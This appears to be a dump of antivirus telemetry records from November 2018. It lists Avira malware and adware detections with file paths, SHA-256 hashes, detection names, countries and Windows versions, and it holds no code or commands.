  Row(detection=Row(filename='avscan-20181102-051058-a7382660', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051058-A7382660', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061141-22e8a156', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061141-22E8A156', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050427-be833e32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050427-BE833E32', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062038-62ed806f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062038-62ED806F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052052-0989e512', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052052-0989E512', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051027-952d1e89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051027-952D1E89', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062038-629fb064', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062038-629FB064', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055637-07c4a557', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055637-07C4A557', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061133-1dc83e98', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061133-1DC83E98', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060252-e78a4ca2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060252-E78A4CA2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052107-12b2f906', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052107-12B2F906', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052315-5ebc75e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052315-5EBC75E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050643-0fbd1a29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050643-0FBD1A29', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051922-d3d1eef5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051922-D3D1EEF5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053415-e7e713b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053415-E7E713B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051150-c6a21e0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051150-C6A21E0B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050522-deee86fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050522-DEEE86FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055406-adba452c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055406-ADBA452C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051917-d099cc76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051917-D099CC76', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054433-58300150', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054433-58300150', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061533-ad4777fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061533-AD4777FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052551-bbd695d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052551-BBD695D1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062404-dd7ae462', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062404-DD7AE462', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050524-e05ac196', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050524-E05AC196', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050647-12027a1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050647-12027A1F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054902-f91a1d2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054902-F91A1D2A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053403-e11c835d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053403-E11C835D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062145-8b01ac05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062145-8B01AC05', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212752-71e4c053', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_19e2935b\\AVSCAN-20181102-212415-53B6D721\\AVSCAN-20181102-212752-71E4C053', filesize=2496000, name='Adware/Wajam.deane.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:27:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052542-b669e8ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052542-B669E8AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050553-f1730adf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050553-F1730ADF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050555-f2a3cb2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050555-F2A3CB2F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054336-365b06d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054336-365B06D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060707-7fcc06cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060707-7FCC06CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055914-65700f46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055914-65700F46', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054337-36db6c26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054337-36DB6C26', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7662165\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3721032, timestamp='2018-11-01T09:46:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (4).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (4).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-01T23:46:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:09:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lpa ke rpg export.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\LPA 2017\\MUTASI LPA KE RPG EXPORT\\LPA KE RPG EXPORT.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mymediadownloader.exe', filepath='E:\\Pendrive\\desktop back up 21.10.2014\\Downloads\\MyMediaDownloader.exe', filesize=592000, name='PUA/Bundlore.#M1.#R1'), hash='4b32bddf9d147dc3701c3827306924aaadf551848e256c4151bba809beb094fc', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T13:50:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:28:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155452-b6478d8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155452-B6478D8F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154710-6878e6e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154710-6878E6E0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160019-ed77853a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160019-ED77853A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pkwt asli.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\PKWT\\REKAP PKWT ASLI\\PKWT ASLI\\PKWT ASLI.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:31:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='februari.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\GAJI RPG\\februari\\februari.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.exe', filepath='E:\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T14:08:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='indonesia.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\GF INDONESIA\\INDONESIA.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh1382', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH1382', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:42:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:56:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210731-28f1c3cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210731-28F1C3CB', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:24Z'), dt=datetime.date(2018, 11, 1)),
